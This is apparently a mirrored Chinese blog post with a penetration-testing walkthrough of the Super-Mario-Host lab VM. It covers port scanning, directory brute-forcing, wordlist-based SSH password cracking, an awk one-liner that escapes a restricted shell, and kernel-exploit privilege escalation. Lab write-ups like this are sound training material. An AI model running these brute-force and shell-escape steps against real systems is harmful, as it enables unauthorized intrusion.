zoukankan      html  css  js  c++  java
  • kali渗透综合靶机(七)--Super-Mario-Host靶机

    kali渗透综合靶机(七)--Super-Mario-Host靶机

    靶机百度云下载  链接:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取码:a8ox

    一、主机发现

    1.netdiscover -i eth0 -r 192.168.10.0/24

      

    二、端口扫描

    1. masscan --rate=10000 -p0-65535 192.168.10.160

      

    三、端口服务识别

    1.nmap -sV -T4 -O 192.168.10.160 -p 22,80

      

    四、漏洞发现与利用

    1.扫描网站目录

    Dirb http://192.168.10.161:8180

      

    2.发现http://192.168.10.161:8180/vhosts

      

    3. 在本地hosts文件添加解析记录

      

    4.浏览器访问http://mario.supermariohost.local:8180/,别的什么都没有

      

    5. 使用dirbuster扫描目录,扫描出来如下目录

      

    6. 发现http://mario.supermariohost.local:8180/luigi.php

      

    7. 发现http://mario.supermariohost.local:8180/command.php  测试luigi,发现存在

      

    8.使用cewl爬取站点下的可疑用户名作为用户名字典

    cewl http://mario.supermariohost.local:8180/ -d -w /root/user.txt

    9. john在该user的基础上生成相应社工密码进行爆破

    john --wordlist=user.txt --stdout --rules > passwd.txt

    10.爆破出密码,使用ssh登录,发现是受限的shell,使用awk调用系统命令,绕过限制

    awk ‘BEGIN{system(“/bin/bash”)}’

      

    11.查看内核版本,然后再kali使用searchsploit查找是否有exp

      

    12.开始提权,成功获得管理员权限

      

     

    总结:

    1.信息收集

    2.dirbuster、dirb扫描目录

    3.测试用户是否存在

    4.使用cewl爬取站点下的可疑用户名作为用户名字典

    5.john在该user的基础上生成相应社工密码进行爆破

    6.受用awk调用系统命令绕过受限的shell

    7.利用内核版本漏洞本地提权

  • 相关阅读:
    C程序之修改Windows的控制台大小
    C程序之修改Windows的控制台颜色(转载)
    VS2010/MFC编程(对话框:模态对话框及其弹出过程)
    C/C++常用头文件及函数汇总
    vs2010点调试,显示系统找不到指定的文件
    C++之类和对象的使用(三)
    C++之类和对象的使用(二)
    idea激活方式
    Java之dom4j的简单解析和生成xml的应用
    Java之POI的excel导入导出
  • 原文地址:https://www.cnblogs.com/yuzly/p/10801308.html
Copyright © 2011-2022 走看看